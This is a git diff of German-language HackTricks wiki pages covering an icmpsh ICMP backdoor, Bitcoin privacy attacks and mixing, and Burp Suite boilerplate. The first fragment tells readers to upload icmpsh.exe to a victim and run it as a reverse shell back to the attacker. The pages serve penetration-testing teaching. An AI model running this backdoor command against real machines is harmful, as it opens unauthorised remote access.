+{% endhint %} - -Laden Sie den Backdoor von folgender Adresse herunter: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Laden Sie den Backdoor herunter von: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) # Clientseite -Führen Sie das Skript **run.sh** aus. +Führen Sie das Skript aus: **run.sh** **Wenn Sie einen Fehler erhalten, versuchen Sie, die Zeilen zu ändern:** ```bash @@ -35,16 +35,17 @@ Laden Sie **icmpsh.exe** auf das Opfer hoch und führen Sie es aus: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.
+{% endhint %} diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index d8d5a0bbb..3967be97c 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,96 +1,95 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
+{% endhint %} ## Grundlegende Konzepte -- **Smart Contracts** werden als Programme definiert, die auf einer Blockchain ausgeführt werden, wenn bestimmte Bedingungen erfüllt sind, um Vereinbarungen ohne Vermittler zu automatisieren. -- **Dezentrale Anwendungen (dApps)** bauen auf Smart Contracts auf und verfügen über eine benutzerfreundliche Benutzeroberfläche und eine transparente, überprüfbare Backend. -- **Tokens & Coins** unterscheiden sich, wobei Coins als digitales Geld dienen, während Tokens Wert oder Eigentum in bestimmten Kontexten repräsentieren. +- **Smart Contracts** sind Programme, die auf einer Blockchain ausgeführt werden, wenn bestimmte Bedingungen erfüllt sind, und Vereinbarungsausführungen ohne Vermittler automatisieren. +- **Dezentralisierte Anwendungen (dApps)** bauen auf Smart Contracts auf und verfügen über eine benutzerfreundliche Oberfläche und ein transparentes, überprüfbares Backend. +- **Tokens & Coins** unterscheiden sich, wobei Münzen als digitales Geld dienen, während Tokens Wert oder Eigentum in spezifischen Kontexten repräsentieren. - **Utility Tokens** gewähren Zugang zu Dienstleistungen, und **Security Tokens** bedeuten Eigentumsrechte an Vermögenswerten. -- **DeFi** steht für Decentralized Finance und bietet Finanzdienstleistungen ohne zentrale Behörden. -- **DEX** und **DAOs** beziehen sich auf dezentrale Börsenplattformen und dezentrale autonome Organisationen. +- **DeFi** steht für Dezentralisierte Finanzen und bietet Finanzdienstleistungen ohne zentrale Behörden. +- **DEX** und **DAOs** beziehen sich auf Dezentralisierte Börsenplattformen und Dezentralisierte Autonome Organisationen. ## Konsensmechanismen Konsensmechanismen gewährleisten sichere und vereinbarte Transaktionsvalidierungen auf der Blockchain: -- **Proof of Work (PoW)** basiert auf Rechenleistung zur Überprüfung von Transaktionen. -- **Proof of Stake (PoS)** erfordert, dass Validatoren eine bestimmte Menge an Tokens halten, wodurch der Energieverbrauch im Vergleich zu PoW reduziert wird. +- **Proof of Work (PoW)** basiert auf Rechenleistung zur Transaktionsverifizierung. +- **Proof of Stake (PoS)** erfordert, dass Validatoren eine bestimmte Menge an Tokens halten, was den Energieverbrauch im Vergleich zu PoW reduziert. -## Bitcoin-Grundlagen +## Bitcoin Grundlagen ### Transaktionen -Bitcoin-Transaktionen beinhalten die Übertragung von Geldern zwischen Adressen. Transaktionen werden durch digitale Signaturen validiert, um sicherzustellen, dass nur der Besitzer des privaten Schlüssels Überweisungen initiieren kann. +Bitcoin-Transaktionen beinhalten die Übertragung von Geldern zwischen Adressen. Transaktionen werden durch digitale Signaturen validiert, wodurch nur der Besitzer des privaten Schlüssels Überweisungen initiieren kann. #### Schlüsselkomponenten: - **Multisignature-Transaktionen** erfordern mehrere Signaturen zur Autorisierung einer Transaktion. -- Transaktionen bestehen aus **Eingängen** (Quelle der Mittel), **Ausgängen** (Ziel), **Gebühren** (an Miner gezahlt) und **Skripten** (Transaktionsregeln). +- Transaktionen bestehen aus **Inputs** (Quelle der Gelder), **Outputs** (Ziel), **Gebühren** (an Miner gezahlt) und **Skripten** (Transaktionsregeln). -### Lightning Network +### Lightning-Netzwerk Ziel ist es, die Skalierbarkeit von Bitcoin zu verbessern, indem mehrere Transaktionen innerhalb eines Kanals ermöglicht werden, wobei nur der endgültige Zustand an die Blockchain übertragen wird. -## Bitcoin-Privatsphäre-Bedenken +## Bitcoin Datenschutzbedenken -Privatsphäre-Angriffe wie **Common Input Ownership** und **UTXO Change Address Detection** nutzen Transaktionsmuster aus. Strategien wie **Mixers** und **CoinJoin** verbessern die Anonymität, indem sie Transaktionsverbindungen zwischen Benutzern verschleiern. +Datenschutzangriffe wie **Common Input Ownership** und **UTXO Change Address Detection** nutzen Transaktionsmuster aus. Strategien wie **Mixers** und **CoinJoin** verbessern die Anonymität, indem sie Transaktionsverbindungen zwischen Benutzern verschleiern. ## Anonymes Erwerben von Bitcoins -Methoden umfassen Bargeldhandel, Mining und die Verwendung von Mixern. **CoinJoin** mischt mehrere Transaktionen, um die Rückverfolgbarkeit zu erschweren, während **PayJoin** CoinJoins als reguläre Transaktionen tarnt, um die Privatsphäre zu erhöhen. +Methoden umfassen Bargeldgeschäfte, Mining und die Verwendung von Mixern. **CoinJoin** mischt mehrere Transaktionen, um die Rückverfolgbarkeit zu erschweren, während **PayJoin** CoinJoins als reguläre Transaktionen tarnt, um die Privatsphäre zu erhöhen. -# Bitcoin-Privatsphäre-Angriffe +# Bitcoin Datenschutzangriffe -# Zusammenfassung der Bitcoin-Privatsphäre-Angriffe +# Zusammenfassung der Bitcoin Datenschutzangriffe -In der Welt von Bitcoin sind die Privatsphäre von Transaktionen und die Anonymität der Benutzer oft Gegenstand von Bedenken. Hier ist ein vereinfachter Überblick über verschiedene gängige Methoden, mit denen Angreifer die Bitcoin-Privatsphäre gefährden können. +In der Welt von Bitcoin sind die Privatsphäre von Transaktionen und die Anonymität der Benutzer oft Gegenstand von Bedenken. Hier ist ein vereinfachter Überblick über mehrere gängige Methoden, durch die Angreifer die Bitcoin-Privatsphäre kompromittieren können. -## **Annahme gemeinsamer Eingabe-Besitz** +## **Annahme gemeinsamer Input-Eigentümerschaft** -Es ist in der Regel selten, dass Eingaben von verschiedenen Benutzern in einer einzigen Transaktion kombiniert werden, aufgrund der damit verbundenen Komplexität. Daher wird oft angenommen, dass **zwei Eingabeadressen in derselben Transaktion demselben Besitzer gehören**. +Es ist in der Regel selten, dass Inputs von verschiedenen Benutzern in einer einzigen Transaktion kombiniert werden, aufgrund der damit verbundenen Komplexität. Daher wird angenommen, dass **zwei Input-Adressen in derselben Transaktion demselben Besitzer gehören**. -## **UTXO Change Address Detection** +## **UTXO-Änderungsadressenerkennung** -Eine UTXO, oder **Unspent Transaction Output**, muss vollständig in einer Transaktion ausgegeben werden. Wenn nur ein Teil davon an eine andere Adresse gesendet wird, geht der Rest an eine neue Wechseladresse. Beobachter können annehmen, dass diese neue Adresse dem Absender gehört und somit die Privatsphäre gefährden. +Ein UTXO oder **Unspent Transaction Output** muss vollständig in einer Transaktion ausgegeben werden. Wenn nur ein Teil davon an eine andere Adresse gesendet wird, geht der Rest an eine neue Änderungsadresse. Beobachter können annehmen, dass diese neue Adresse dem Absender gehört, was die Privatsphäre gefährdet. ### Beispiel -Um dies zu verhindern, können Mischdienste oder die Verwendung mehrerer Adressen helfen, den Besitz zu verschleiern. +Um dies zu mildern, können Mischdienste oder die Verwendung mehrerer Adressen helfen, die Eigentumsverhältnisse zu verschleiern. -## **Exposition in sozialen Netzwerken und Foren** +## **Soziale Netzwerke & Foren-Exposition** Benutzer teilen manchmal ihre Bitcoin-Adressen online, was es **einfach macht, die Adresse ihrem Besitzer zuzuordnen**. -## **Analyse des Transaktionsgraphen** +## **Transaktionsgraphenanalyse** -Transaktionen können als Graphen visualisiert werden, der potenzielle Verbindungen zwischen Benutzern aufgrund des Geldflusses aufzeigt. +Transaktionen können als Graphen visualisiert werden, wodurch potenzielle Verbindungen zwischen Benutzern basierend auf dem Geldfluss sichtbar werden. -## **Unnötige Eingabe-Heuristik (Optimal Change Heuristic)** +## **Unnötige Input-Heuristik (Optimale Änderungsheuristik)** -Diese Heuristik basiert auf der Analyse von Transaktionen mit mehreren Eingängen und Ausgängen, um zu erraten, welcher Ausgang die Rückgabe an den Absender ist. +Diese Heuristik basiert auf der Analyse von Transaktionen mit mehreren Inputs und Outputs, um zu erraten, welcher Output die Änderung ist, die an den Absender zurückgeht. ### Beispiel ```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Wenn das Hinzufügen weiterer Eingaben dazu führt, dass die Ausgabe größer ist als jeder einzelne Eingabe, kann dies die Heuristik verwirren. - ## **Erzwungene Adresswiederverwendung** -Angreifer können kleine Beträge an zuvor verwendete Adressen senden, in der Hoffnung, dass der Empfänger diese in zukünftigen Transaktionen mit anderen Eingaben kombiniert und somit die Adressen miteinander verknüpft. +Angreifer können kleine Beträge an zuvor verwendete Adressen senden, in der Hoffnung, dass der Empfänger diese mit anderen Inputs in zukünftigen Transaktionen kombiniert und somit Adressen miteinander verknüpft. ### Korrektes Verhalten der Wallet Wallets sollten vermeiden, Münzen, die auf bereits verwendeten, leeren Adressen empfangen wurden, zu verwenden, um dieses Datenschutzleck zu verhindern. @@ -98,59 +97,59 @@ Wallets sollten vermeiden, Münzen, die auf bereits verwendeten, leeren Adressen ## **Andere Blockchain-Analysetechniken** - **Exakte Zahlungsbeträge:** Transaktionen ohne Wechselgeld stammen wahrscheinlich von zwei Adressen, die demselben Benutzer gehören. -- **Runde Zahlen:** Eine runde Zahl in einer Transaktion deutet darauf hin, dass es sich um eine Zahlung handelt, wobei die nicht runde Ausgabe wahrscheinlich das Wechselgeld ist. -- **Wallet-Fingerprinting:** Unterschiedliche Wallets haben einzigartige Muster bei der Erstellung von Transaktionen, was Analysten ermöglicht, die verwendete Software und möglicherweise die Wechseladresse zu identifizieren. -- **Korrelation von Beträgen und Zeitpunkten:** Die Offenlegung von Transaktionszeiten oder -beträgen kann Transaktionen nachverfolgbar machen. +- **Runde Beträge:** Ein runder Betrag in einer Transaktion deutet darauf hin, dass es sich um eine Zahlung handelt, wobei der nicht runde Output wahrscheinlich das Wechselgeld ist. +- **Wallet-Fingerprinting:** Unterschiedliche Wallets haben einzigartige Transaktionsmuster, die es Analysten ermöglichen, die verwendete Software und potenziell die Wechseladresse zu identifizieren. +- **Betrag & Zeitkorrelationen:** Die Offenlegung von Transaktionszeiten oder -beträgen kann Transaktionen nachverfolgbar machen. -## **Traffic-Analyse** +## **Verkehrsanalyse** -Durch Überwachung des Netzwerkverkehrs können Angreifer potenziell Transaktionen oder Blöcke mit IP-Adressen verknüpfen und die Privatsphäre der Benutzer gefährden. Dies gilt insbesondere, wenn eine Entität viele Bitcoin-Knoten betreibt und so ihre Fähigkeit zur Überwachung von Transaktionen erhöht. +Durch die Überwachung des Netzwerkverkehrs können Angreifer potenziell Transaktionen oder Blöcke mit IP-Adressen verknüpfen und somit die Privatsphäre der Benutzer gefährden. Dies gilt insbesondere, wenn eine Entität viele Bitcoin-Nodes betreibt, was ihre Fähigkeit zur Überwachung von Transaktionen verbessert. ## Mehr -Für eine umfassende Liste von Angriffen auf die Privatsphäre und Verteidigungsmöglichkeiten besuchen Sie [Bitcoin Privacy auf Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +Für eine umfassende Liste von Datenschutzangriffen und -verteidigungen besuchen Sie [Bitcoin Privacy auf Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). # Anonyme Bitcoin-Transaktionen ## Möglichkeiten, Bitcoins anonym zu erhalten -- **Bargeldtransaktionen**: Erwerb von Bitcoin gegen Bargeld. -- **Bargeldalternativen**: Kauf von Geschenkkarten und Umtausch gegen Bitcoin im Internet. -- **Mining**: Die privateste Methode, Bitcoins zu verdienen, ist das Mining, insbesondere wenn es alleine durchgeführt wird, da Mining-Pools die IP-Adresse des Miners kennen könnten. [Informationen zu Mining-Pools](https://en.bitcoin.it/wiki/Pooled_mining) -- **Diebstahl**: Theoretisch könnte der Diebstahl von Bitcoin eine weitere Methode sein, um es anonym zu erwerben, obwohl dies illegal ist und nicht empfohlen wird. +- **Bartransaktionen**: Bitcoin durch Bargeld erwerben. +- **Baralternativen**: Kauf von Geschenkkarten und Umtausch gegen Bitcoin online. +- **Mining**: Die privateste Methode, Bitcoins zu verdienen, ist das Mining, insbesondere wenn es alleine durchgeführt wird, da Mining-Pools die IP-Adresse des Miners kennen könnten. [Mining-Pool-Informationen](https://en.bitcoin.it/wiki/Pooled_mining) +- **Diebstahl**: Theoretisch könnte der Diebstahl von Bitcoin eine weitere Methode sein, um sie anonym zu erwerben, obwohl dies illegal ist und nicht empfohlen wird. ## Mixing-Services -Durch die Verwendung eines Mixing-Services kann ein Benutzer **Bitcoins senden** und **verschiedene Bitcoins als Gegenleistung erhalten**, was die Rückverfolgung des ursprünglichen Eigentümers erschwert. Dies erfordert jedoch Vertrauen in den Service, dass er keine Protokolle führt und die Bitcoins tatsächlich zurückgibt. Alternative Mixing-Optionen umfassen Bitcoin-Casinos. +Durch die Verwendung eines Mixing-Services kann ein Benutzer **Bitcoins senden** und **verschiedene Bitcoins als Gegenleistung erhalten**, was es schwierig macht, den ursprünglichen Besitzer zurückzuverfolgen. Dies erfordert jedoch Vertrauen in den Service, keine Logs zu behalten und tatsächlich die Bitcoins zurückzugeben. Alternative Mixing-Optionen umfassen Bitcoin-Casinos. ## CoinJoin -**CoinJoin** vereint mehrere Transaktionen von verschiedenen Benutzern zu einer einzigen, was den Prozess für jeden erschwert, der versucht, Eingaben mit Ausgaben abzugleichen. Trotz seiner Effektivität können Transaktionen mit eindeutigen Eingabe- und Ausgabegrößen immer noch potenziell zurückverfolgt werden. +**CoinJoin** vereint mehrere Transaktionen von verschiedenen Benutzern zu einer einzigen, was den Prozess für jeden erschwert, der versucht, Inputs mit Outputs abzugleichen. Trotz seiner Wirksamkeit können Transaktionen mit einzigartigen Input- und Output-Größen potenziell immer noch zurückverfolgt werden. Beispieltransaktionen, die möglicherweise CoinJoin verwendet haben, sind `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` und `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -Für weitere Informationen besuchen Sie [CoinJoin](https://coinjoin.io/en). Für einen ähnlichen Service auf Ethereum schauen Sie sich [Tornado Cash](https://tornado.cash) an, der Transaktionen mit Mitteln von Minern anonymisiert. +Für weitere Informationen besuchen Sie [CoinJoin](https://coinjoin.io/en). Für einen ähnlichen Service auf Ethereum werfen Sie einen Blick auf [Tornado Cash](https://tornado.cash), der Transaktionen mit Mitteln von Minern anonymisiert. ## PayJoin -Eine Variante von CoinJoin, **PayJoin** (oder P2EP), tarnt die Transaktion zwischen zwei Parteien (z. B. einem Kunden und einem Händler) als reguläre Transaktion, ohne die charakteristische Gleichheit der Ausgaben von CoinJoin. Dadurch wird es äußerst schwierig zu erkennen und könnte die von Transaktionsüberwachungseinheiten verwendete Heuristik zur gemeinsamen Eingabe-Eigentümerschaft ungültig machen. +Eine Variante von CoinJoin, **PayJoin** (oder P2EP), tarnt die Transaktion zwischen zwei Parteien (z. B. einem Kunden und einem Händler) als reguläre Transaktion, ohne die charakteristischen gleichen Outputs von CoinJoin. Dies macht es äußerst schwer zu erkennen und könnte die von Transaktionsüberwachungseinheiten verwendete Heuristik zur gemeinsamen Input-Zugehörigkeit ungültig machen. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -Transaktionen wie die oben genannte könnten PayJoin sein, was die Privatsphäre erhöht, während sie von herkömmlichen Bitcoin-Transaktionen nicht zu unterscheiden sind. +Transaktionen wie die oben genannte könnten PayJoin sein, was die Privatsphäre verbessert, während sie von Standard-Bitcoin-Transaktionen nicht zu unterscheiden sind. -**Die Verwendung von PayJoin könnte herkömmliche Überwachungsmethoden erheblich stören**, was eine vielversprechende Entwicklung in Bezug auf die Wahrung der Transaktionsprivatsphäre darstellt. +**Die Nutzung von PayJoin könnte herkömmliche Überwachungsmethoden erheblich stören**, was eine vielversprechende Entwicklung in der Verfolgung der Transaktionsprivatsphäre darstellt. -# Best Practices für Privatsphäre in Kryptowährungen +# Best Practices für Privatsphäre bei Kryptowährungen -## **Techniken zur Wallet-Synchronisierung** +## **Wallet-Synchronisationstechniken** -Um Privatsphäre und Sicherheit zu gewährleisten, ist die Synchronisierung von Wallets mit der Blockchain entscheidend. Zwei Methoden sind besonders herausragend: +Um die Privatsphäre und Sicherheit zu gewährleisten, ist die Synchronisierung von Wallets mit der Blockchain entscheidend. Zwei Methoden zeichnen sich aus: -- **Full Node**: Durch das Herunterladen der gesamten Blockchain stellt ein Full Node maximale Privatsphäre sicher. Alle jemals getätigten Transaktionen werden lokal gespeichert, sodass es für Angreifer unmöglich ist, herauszufinden, an welchen Transaktionen oder Adressen der Benutzer interessiert ist. -- **Client-seitige Blockfilterung**: Diese Methode beinhaltet das Erstellen von Filtern für jeden Block in der Blockchain, sodass Wallets relevante Transaktionen identifizieren können, ohne spezifische Interessen für Netzwerkbeobachter preiszugeben. Leichte Wallets laden diese Filter herunter und holen nur vollständige Blöcke ab, wenn eine Übereinstimmung mit den Adressen des Benutzers gefunden wird. +- **Full Node**: Durch den Download der gesamten Blockchain stellt ein Full Node maximale Privatsphäre sicher. Alle jemals getätigten Transaktionen werden lokal gespeichert, was es für Angreifer unmöglich macht, zu identifizieren, an welchen Transaktionen oder Adressen der Benutzer interessiert ist. +- **Client-seitige Blockfilterung**: Diese Methode beinhaltet die Erstellung von Filtern für jeden Block in der Blockchain, die es Wallets ermöglichen, relevante Transaktionen zu identifizieren, ohne spezifische Interessen für Netzwerkbeobachter preiszugeben. Leichte Wallets laden diese Filter herunter und holen nur vollständige Blöcke ab, wenn eine Übereinstimmung mit den Adressen des Benutzers gefunden wird. ## **Nutzung von Tor für Anonymität** @@ -162,25 +161,25 @@ Um die Privatsphäre zu schützen, ist es wichtig, für jede Transaktion eine ne ## **Strategien für Transaktionsprivatsphäre** -- **Mehrere Transaktionen**: Die Aufteilung einer Zahlung in mehrere Transaktionen kann den Transaktionsbetrag verschleiern und Privatsphäreangriffe vereiteln. -- **Vermeidung von Wechselgeld**: Die Wahl von Transaktionen, die kein Wechselgeld erfordern, erhöht die Privatsphäre, indem Wechselgeld-Erkennungsmethoden gestört werden. -- **Mehrere Wechselgeldausgaben**: Wenn das Vermeiden von Wechselgeld nicht möglich ist, kann die Generierung mehrerer Wechselgeldausgaben die Privatsphäre dennoch verbessern. +- **Mehrere Transaktionen**: Die Aufteilung einer Zahlung in mehrere Transaktionen kann den Transaktionsbetrag verschleiern und Datenschutzangriffe vereiteln. +- **Vermeidung von Wechselgeld**: Die Wahl von Transaktionen, die keine Wechselgeldausgaben erfordern, erhöht die Privatsphäre, indem Wechselgelderfassungsmethoden gestört werden. +- **Mehrere Wechselgeldausgaben**: Wenn die Vermeidung von Wechselgeld nicht möglich ist, kann die Generierung mehrerer Wechselgeldausgaben die Privatsphäre dennoch verbessern. # **Monero: Ein Leuchtfeuer der Anonymität** -Monero adressiert das Bedürfnis nach absoluter Anonymität bei digitalen Transaktionen und setzt einen hohen Standard für Privatsphäre. +Monero deckt den Bedarf an absoluter Anonymität bei digitalen Transaktionen ab und setzt einen hohen Standard für Privatsphäre. # **Ethereum: Gas und Transaktionen** ## **Verständnis von Gas** -Gas misst den Rechenaufwand, der für die Ausführung von Operationen auf Ethereum erforderlich ist, und wird in **Gwei** berechnet. Eine Transaktion, die 2.310.000 Gwei (oder 0,00231 ETH) kostet, umfasst ein Gaslimit und eine Basisgebühr sowie ein Trinkgeld zur Anreizung der Miner. Benutzer können eine maximale Gebühr festlegen, um sicherzustellen, dass sie nicht zu viel bezahlen, wobei der Überschuss zurückerstattet wird. +Gas misst den Rechenaufwand, der benötigt wird, um Operationen auf Ethereum auszuführen, und wird in **Gwei** bemessen. Zum Beispiel erfordert eine Transaktion, die 2.310.000 Gwei (oder 0,00231 ETH) kostet, ein Gaslimit und eine Grundgebühr sowie ein Trinkgeld zur Anreizsetzung für Miner. Benutzer können eine maximale Gebühr festlegen, um sicherzustellen, dass sie nicht zu viel bezahlen, wobei der Überschuss zurückerstattet wird. ## **Ausführung von Transaktionen** -Transaktionen in Ethereum umfassen einen Absender und einen Empfänger, die entweder Benutzer- oder Smart Contract-Adressen sein können. Sie erfordern eine Gebühr und müssen gemint werden. Wesentliche Informationen in einer Transaktion sind der Empfänger, die Signatur des Absenders, der Wert, optionale Daten, das Gaslimit und die Gebühren. Beachtenswert ist, dass die Adresse des Absenders aus der Signatur abgeleitet wird und daher nicht in den Transaktionsdaten enthalten sein muss. +Transaktionen in Ethereum beinhalten einen Absender und einen Empfänger, die entweder Benutzer- oder Smart-Vertragsadressen sein können. Sie erfordern eine Gebühr und müssen gemined werden. Wesentliche Informationen in einer Transaktion sind der Empfänger, die Signatur des Absenders, der Wert, optionale Daten, das Gaslimit und die Gebühren. Bemerkenswert ist, dass die Adresse des Absenders aus der Signatur abgeleitet wird, was die Notwendigkeit dafür in den Transaktionsdaten eliminiert. -Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Kryptowährungen beschäftigen möchte und dabei Privatsphäre und Sicherheit priorisiert. +Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Kryptowährungen beschäftigen möchte, während er Privatsphäre und Sicherheit priorisiert. ## Referenzen @@ -191,18 +190,3 @@ Diese Praktiken und Mechanismen sind grundlegend für jeden, der sich mit Krypto * [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/) * [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/) * [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse) - - -
- -Lernen Sie das Hacken von AWS von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen** möchten, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** - -
diff --git a/burp-suite.md b/burp-suite.md index 6fa86a84b..22ed3bd11 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
